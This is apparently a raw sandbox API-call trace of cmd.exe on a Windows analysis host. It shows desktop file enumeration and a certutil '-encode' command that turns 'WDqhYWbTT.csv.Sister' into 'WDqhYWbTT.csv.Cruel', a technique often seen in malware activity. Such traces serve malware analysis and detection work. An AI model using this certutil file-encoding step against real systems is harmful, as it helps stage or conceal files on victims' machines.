??_V@YAXPEAX@Z () returned 0x1 [0264.434] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a867490, ftCreationTime.dwHighDateTime=0x1d5e872, ftLastAccessTime.dwLowDateTime=0x264895d0, ftLastAccessTime.dwHighDateTime=0x1d5e870, ftLastWriteTime.dwLowDateTime=0x264895d0, ftLastWriteTime.dwHighDateTime=0x1d5e870, nFileSizeHigh=0x0, nFileSizeLow=0x12425, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="WDqhYWbTT.csv.Sister", cAlternateFileName="")) returned 1 [0264.434] GetProcessHeap () returned 0x21ed8c70000 [0264.434] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b0130, Size=0x5de) returned 0x21ed8d44660 [0264.434] GetProcessHeap () returned 0x21ed8c70000 [0264.434] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d44660) returned 0x5de [0264.435] GetProcessHeap () returned 0x21ed8c70000 [0264.435] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6aeb0 [0264.435] GetProcessHeap () returned 0x21ed8c70000 [0264.435] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6aeb0, Size=0x58) returned 0x21ed8d6aeb0 [0264.435] GetProcessHeap () returned 0x21ed8c70000 [0264.435] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6aeb0) returned 0x58 [0264.435] GetProcessHeap () returned 0x21ed8c70000 [0264.435] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d6af20 [0264.435] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0264.436] GetProcessHeap () returned 0x21ed8c70000 [0264.436] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x3a) returned 0x21ed8cc7e20 [0264.436] ??_V@YAXPEAX@Z () returned 0x1 [0264.436] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0264.437] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0264.437] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0264.437] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7d0c0 [0264.437] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0264.438] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xc7ee691a, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xc7ee691a, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cdc0 [0264.438] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0264.438] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\WDqhYWbTT.csv.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6a867490, ftCreationTime.dwHighDateTime=0x1d5e872, ftLastAccessTime.dwLowDateTime=0x264895d0, ftLastAccessTime.dwHighDateTime=0x1d5e870, ftLastWriteTime.dwLowDateTime=0x264895d0, ftLastWriteTime.dwHighDateTime=0x1d5e870, nFileSizeHigh=0x0, nFileSizeLow=0x12425, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="WDqhYWbTT.csv.Sister", cAlternateFileName="WDQHYW~1.SIS")) returned 0x21ed8c7cdc0 [0264.438] FindClose (in: hFindFile=0x21ed8c7cdc0 | out: hFindFile=0x21ed8c7cdc0) returned 1 [0264.438] _wcsnicmp (_String1="WDQHYW~1.SIS", _String2="WDqhYWbTT.csv.Sister", _MaxCount=0x14) returned 28 [0264.438] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0264.438] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0264.439] GetProcessHeap () returned 0x21ed8c70000 [0264.439] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2c) returned 0x21ed8cc88d0 [0264.439] ??_V@YAXPEAX@Z () returned 0x1 [0264.439] ??_V@YAXPEAX@Z () returned 0x1 [0264.439] GetProcessHeap () returned 0x21ed8c70000 [0264.439] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d6af20, Size=0x1c0) returned 0x21ed8d6af20 [0264.439] GetProcessHeap () returned 0x21ed8c70000 [0264.439] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d6af20) returned 0x1c0 [0264.439] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0264.439] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.439] GetFileType (hFile=0x50) returned 0x2 [0264.439] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.439] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0264.440] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.440] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0264.447] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0264.447] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0264.447] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0264.447] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0264.447] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.447] GetFileType (hFile=0x50) returned 0x2 [0264.447] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.447] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0264.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.448] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0264.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.448] GetFileType (hFile=0x50) returned 0x2 [0264.448] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.448] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0264.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.449] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d6aec0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d6aec0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0264.449] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"WDqhYWbTT.csv.Sister\" \"WDqhYWbTT.csv.Cruel\" ") returned 54 [0264.449] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.449] GetFileType (hFile=0x50) returned 0x2 [0264.450] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.450] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0264.450] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.450] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x36) returned 1 [0264.451] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0264.451] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.451] GetFileType (hFile=0x50) returned 0x2 [0264.452] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0264.452] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0264.452] _get_osfhandle (_FileHandle=1) returned 0x50 [0264.452] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0264.457] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0264.458] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0264.458] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0264.458] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0264.458] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0264.458] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0264.458] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0264.458] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0264.458] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0264.458] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0264.459] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0264.459] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0264.459] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0264.459] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0264.459] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0264.459] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0264.459] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0264.459] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0264.459] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0264.459] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0264.459] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0264.459] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0264.459] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0264.459] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0264.459] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0264.459] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0264.459] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0264.459] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0264.459] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0264.459] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0264.459] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0264.459] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0264.459] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0264.459] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0264.459] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0264.460] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0264.460] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0264.460] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0264.460] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0264.460] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0264.460] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0264.460] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0264.460] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0264.464] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0264.464] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0264.464] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0264.464] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0264.464] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0264.464] _wcsicmp (_String1="certutil", _String2="ERASE") returned -2 [0264.464] _wcsicmp (_String1="certutil", _String2="DEL") returned -1 [0264.464] _wcsicmp (_String1="certutil", _String2="TYPE") returned -17 [0264.464] _wcsicmp (_String1="certutil", _String2="COPY") returned -10 [0264.464] _wcsicmp (_String1="certutil", _String2="CD") returned 1 [0264.464] _wcsicmp (_String1="certutil", _String2="CHDIR") returned -3 [0264.464] _wcsicmp (_String1="certutil", _String2="RENAME") returned -15 [0264.464] _wcsicmp (_String1="certutil", _String2="REN") returned -15 [0264.464] _wcsicmp (_String1="certutil", _String2="ECHO") returned -2 [0264.464] _wcsicmp (_String1="certutil", _String2="SET") returned -16 [0264.464] _wcsicmp (_String1="certutil", _String2="PAUSE") returned -13 [0264.465] _wcsicmp (_String1="certutil", _String2="DATE") returned -1 [0264.465] _wcsicmp (_String1="certutil", _String2="TIME") returned -17 [0264.465] _wcsicmp (_String1="certutil", _String2="PROMPT") returned -13 [0264.465] _wcsicmp (_String1="certutil", _String2="MD") returned -10 [0264.465] _wcsicmp (_String1="certutil", _String2="MKDIR") returned -10 [0264.465] _wcsicmp (_String1="certutil", _String2="RD") returned -15 [0264.465] _wcsicmp (_String1="certutil", _String2="RMDIR") returned -15 [0264.465] _wcsicmp (_String1="certutil", _String2="PATH") returned -13 [0264.465] _wcsicmp (_String1="certutil", _String2="GOTO") returned -4 [0264.465] _wcsicmp (_String1="certutil", _String2="SHIFT") returned -16 [0264.465] _wcsicmp (_String1="certutil", _String2="CLS") returned -7 [0264.465] _wcsicmp (_String1="certutil", _String2="CALL") returned 4 [0264.465] _wcsicmp (_String1="certutil", _String2="VERIFY") returned -19 [0264.465] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0264.465] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0264.465] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0264.465] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0264.465] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0264.465] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0264.465] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0264.465] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0264.465] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0264.465] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0264.465] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0264.465] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0264.465] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0264.465] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0264.466] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0264.466] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0264.466] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0264.466] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0264.466] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0264.466] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0264.466] ??_V@YAXPEAX@Z () returned 0x1 [0264.466] GetProcessHeap () returned 0x21ed8c70000 [0264.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed93d0e20 [0264.466] GetProcessHeap () returned 0x21ed8c70000 [0264.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x8e) returned 0x21ed8d657f0 [0264.466] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0264.466] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0264.466] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0264.466] GetProcessHeap () returned 0x21ed8c70000 [0264.466] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed93e0e10 [0264.469] SetErrorMode (uMode=0x0) returned 0x0 [0264.469] SetErrorMode (uMode=0x1) returned 0x0 [0264.469] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed93e0e20, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0264.469] SetErrorMode (uMode=0x0) returned 0x1 [0264.469] GetProcessHeap () returned 0x21ed8c70000 [0264.469] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93e0e10, Size=0x52) returned 0x21ed93e0e10 [0264.469] GetProcessHeap () returned 0x21ed8c70000 [0264.469] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93e0e10) returned 0x52 [0264.469] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0264.469] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0264.469] GetProcessHeap () returned 0x21ed8c70000 [0264.469] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed937b540 [0264.469] GetProcessHeap () returned 0x21ed8c70000 [0264.469] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed93b08d0 [0264.469] GetProcessHeap () returned 0x21ed8c70000 [0264.469] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93b08d0, Size=0x1be) returned 0x21ed93b08d0 [0264.469] GetProcessHeap () returned 0x21ed8c70000 [0264.469] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93b08d0) returned 0x1be [0264.470] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0264.470] GetProcessHeap () returned 0x21ed8c70000 [0264.470] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8cc84a0 [0264.470] GetProcessHeap () returned 0x21ed8c70000 [0264.470] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8cc84a0, Size=0x7e) returned 0x21ed8cc84a0 [0264.470] GetProcessHeap () returned 0x21ed8c70000 [0264.470] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8cc84a0) returned 0x7e [0264.470] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.470] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0264.470] GetLastError () returned 0x2 [0264.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.471] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0264.471] GetLastError () returned 0x2 [0264.471] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0264.472] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0264.472] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0264.472] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0264.472] GetLastError () returned 0x2 [0264.472] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7d0c0 [0264.472] FindClose (in: hFindFile=0x21ed8c7d0c0 | out: hFindFile=0x21ed8c7d0c0) returned 1 [0264.473] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0264.473] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0264.473] ??_V@YAXPEAX@Z () returned 0x1 [0264.473] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0264.473] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0264.474] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0264.474] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0264.474] GetProcessHeap () returned 0x21ed8c70000 [0264.474] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45b60 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0264.474] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0264.475] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0264.476] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 